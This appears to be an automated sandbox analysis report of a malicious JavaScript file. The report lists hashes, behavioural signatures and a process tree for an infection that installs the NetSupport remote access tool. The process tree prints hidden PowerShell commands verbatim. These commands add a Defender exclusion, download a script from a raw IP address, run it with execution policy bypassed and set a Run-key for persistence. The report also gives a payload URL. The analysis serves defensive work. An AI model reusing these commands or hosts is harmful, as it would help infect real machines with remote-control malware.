Analysis
-
max time kernel
82s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
27/05/2023, 06:47
Static task
static1
Behavioral task
behavioral1
Sample
c80a26b806b3486c6157d8904c2e13e7.js
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
c80a26b806b3486c6157d8904c2e13e7.js
Resource
win10v2004-20230220-en
General
-
Target
c80a26b806b3486c6157d8904c2e13e7.js
-
Size
1KB
-
MD5
c80a26b806b3486c6157d8904c2e13e7
-
SHA1
54d8be3eb5bdd4a788dcef3265cab6c314be1ccc
-
SHA256
64339638d9234ab1efe25fe180b3097a6614687c8f83b1cc0c5a1dde570aaf81
-
SHA512
4b7c084016a3fb20ae5b95c51c0459c327b163f0d7d942d931182009cd4bde50f24a867d7e60b62a6801189bcb4bba425b474e85b009ccb27e88bc3af6f59200
Malware Config
Extracted
http://golden-scalen.com/ngg_cl.zip
Signatures
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 552 2012 cmd.exe 81 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4748 2012 cmd.exe 81 -
Blocklisted process makes network request 2 IoCs
flow pid Process 6 3700 wscript.exe 20 4184 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 1204 client32.exe -
Loads dropped DLL 5 IoCs
pid Process 1204 client32.exe 1204 client32.exe 1204 client32.exe 1204 client32.exe 1204 client32.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VCRuntmeLib_1 = "C:\\Users\\Admin\\AppData\\Roaming\\VCRuntmeLib_1\\client32.exe" powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings cmd.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 2860 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 4184 powershell.exe 4184 powershell.exe 1004 powershell.exe 1004 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4184 powershell.exe Token: SeDebugPrivilege 1004 powershell.exe Token: SeSecurityPrivilege 1204 client32.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1204 client32.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 552 wrote to memory of 2728 552 cmd.exe 88 PID 552 wrote to memory of 2728 552 cmd.exe 88 PID 2728 wrote to memory of 4184 2728 cmd.exe 90 PID 2728 wrote to memory of 4184 2728 cmd.exe 90 PID 4748 wrote to memory of 2860 4748 cmd.exe 91 PID 4748 wrote to memory of 2860 4748 cmd.exe 91 PID 2728 wrote to memory of 1004 2728 cmd.exe 92 PID 2728 wrote to memory of 1004 2728 cmd.exe 92 PID 1004 wrote to memory of 1204 1004 powershell.exe 100 PID 1004 wrote to memory of 1204 1004 powershell.exe 100 PID 1004 wrote to memory of 1204 1004 powershell.exe 100
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\c80a26b806b3486c6157d8904c2e13e7.js1⤵
- Blocklisted process makes network request
PID:3700
-
C:\Windows\system32\cmd.execmd /c start /MIN C:\ProgramData\BLD.bat1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:552 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\ProgramData\BLD.bat2⤵
- Suspicious use of WriteProcessMemory
PID:2728 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe -WindowStyle hidden "Add-MpPreference -ExclusionExtension "Start-Sleep -Seconds 3;"Invoke-WebRequest 'http://188.227.59.169/zayavka/1.yay' -OutFile 'C:\ProgramData\archive.ps1'";3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4184
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -nop -w hidden -ep bypass C:\ProgramData\archive.ps13⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1004 -
C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\client32.exe"C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\client32.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1204
-
-
-
-
C:\Windows\system32\cmd.execmd /c start C:\ProgramData\zayavka2.txt1⤵
- Process spawned unexpected child process
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4748 -
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\zayavka2.txt2⤵
- Opens file in notepad (likely ransom note)
PID:2860
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
322B
MD5018d63793042f588a85968475d98decf
SHA12c4f9a0bd490c2b53976adf08805dcc92fac349a
SHA256afa8d3929a2809a91ffaa775fcc953b293e52b8accce3cd24c843cb0abbd13d0
SHA512ee91d2218f6ac4d763858c8be3cc7ee23660de14e8dd6aea2a4a40b45a5aa6c3337ac13a366db52aab796f04058e2ec92ec81dec6c3cb93d4c310f59a6f9f98a
-
Filesize
905B
MD550dc5faa02227c0aefa8b54c8e5b2b0d
SHA127fe39b6b053685d4c781a7fa809840ebaab15d7
SHA256aafc02e9f9c6ce1e9ff7aff753e5656d3d26041e06b78a9fd60ca6fe5127e09b
SHA5125bb8701fa6b026e99a8f269b89660ee8abba7c88a654f756d455a13e418a29c75e1742278046985bcc599151f0838591ef58ae8f742016153e43c8c5a78da442
-
Filesize
1KB
MD56cea5f86700d707b53b8f4a67d1ccf29
SHA137e53dd35cbf58bd9c3b7ba0bbd7be81fcb9fe54
SHA2566e9ba5a17bb1ee71c64337b4cd794336eaed26e79d5e2eba6c31018bc9103c70
SHA512d836c1624995dd93462fa462ec83c5c150189c0e7b2c0c9eeb923c7b7aec40aa91e27f10ac7b5a4dc8e78c2dc8df121c97022e9b8fbdaf0d5c93f59a0e535c29
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD575b4b2eecda41cec059c973abb1114c0
SHA111dadf4817ead21b0340ce529ee9bbd7f0422668
SHA2565540f4ea6d18b1aa94a3349652133a4f6641d456757499b7ab12e7ee8f396134
SHA51287feaf17bd331ed6afd9079fefb1d8f5d3911ababf8ea7542be16c946301a7172a5dc46d249b2192376957468d75bf1c99752529ca77ec0aa78a8d054b3a6626
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
320KB
MD52d3b207c8a48148296156e5725426c7f
SHA1ad464eb7cf5c19c8a443ab5b590440b32dbc618f
SHA256edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796
SHA51255c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c
-
Filesize
320KB
MD52d3b207c8a48148296156e5725426c7f
SHA1ad464eb7cf5c19c8a443ab5b590440b32dbc618f
SHA256edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796
SHA51255c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c
-
Filesize
755KB
MD50e37fbfa79d349d672456923ec5fbbe3
SHA14e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA2568793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA5122bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630
-
Filesize
257B
MD5390c964070626a64888d385c514f568e
SHA1a556209655dcb5e939fd404f57d199f2bb6da9b3
SHA256ad0d05305fdeb3736c1e8d49c3a6746073d27b4703eb6de6589bdc4aa72d7b54
SHA512f089c59a24f33410cf98fba7ea0dd2ca0fd997efc9a03e5355cde3c1a1f4a78b13cebd387099b9de824bffea01c489d8f0e90df56f89973007dabb6afdde607f
-
Filesize
18KB
MD5a0b9388c5f18e27266a31f8c5765b263
SHA1906f7e94f841d464d4da144f7c858fa2160e36db
SHA256313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a
SHA5126051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd
-
Filesize
3.6MB
MD500587238d16012152c2e951a087f2cc9
SHA1c4e27a43075ce993ff6bb033360af386b2fc58ff
SHA25663aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8
SHA512637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226
-
Filesize
3.6MB
MD500587238d16012152c2e951a087f2cc9
SHA1c4e27a43075ce993ff6bb033360af386b2fc58ff
SHA25663aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8
SHA512637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226
-
Filesize
101KB
MD5c4f1b50e3111d29774f7525039ff7086
SHA157539c95cba0986ec8df0fcdea433e7c71b724c6
SHA25618df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d
SHA512005db65cedaaccc85525fb3cdab090054bb0bb9cc8c37f8210ec060f490c64945a682b5dd5d00a68ac2b8c58894b6e7d938acaa1130c1cc5667e206d38b942c5
-
Filesize
101KB
MD5c4f1b50e3111d29774f7525039ff7086
SHA157539c95cba0986ec8df0fcdea433e7c71b724c6
SHA25618df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d
SHA512005db65cedaaccc85525fb3cdab090054bb0bb9cc8c37f8210ec060f490c64945a682b5dd5d00a68ac2b8c58894b6e7d938acaa1130c1cc5667e206d38b942c5
-
Filesize
101KB
MD5c4f1b50e3111d29774f7525039ff7086
SHA157539c95cba0986ec8df0fcdea433e7c71b724c6
SHA25618df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d
SHA512005db65cedaaccc85525fb3cdab090054bb0bb9cc8c37f8210ec060f490c64945a682b5dd5d00a68ac2b8c58894b6e7d938acaa1130c1cc5667e206d38b942c5
-
Filesize
908B
MD5edfb8d26fa34436f2e92d5be1cb5901b
SHA179bffe330575dcb9d0fe746325bc42e48da397f4
SHA2562b8fcbb905bd0a948a924a0f09534bac65ca444e023e5de301f4d4f83bc840e5
SHA512682f5e977462f6f73ad2698f5c17473d8a7037fbbb0d6b014783f6ac18405d0731f4e2b43f85a45d3d01b1cc9c676bd03fe6932a2293d2f9ab3b49f7ea31e40a
-
Filesize
755KB
MD50e37fbfa79d349d672456923ec5fbbe3
SHA14e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA2568793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA5122bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630
-
Filesize
32KB
MD5dcde2248d19c778a41aa165866dd52d0
SHA17ec84be84fe23f0b0093b647538737e1f19ebb03
SHA2569074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917
SHA512c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166
-
Filesize
32KB
MD5dcde2248d19c778a41aa165866dd52d0
SHA17ec84be84fe23f0b0093b647538737e1f19ebb03
SHA2569074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917
SHA512c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166
-
Filesize
18KB
MD5a0b9388c5f18e27266a31f8c5765b263
SHA1906f7e94f841d464d4da144f7c858fa2160e36db
SHA256313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a
SHA5126051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd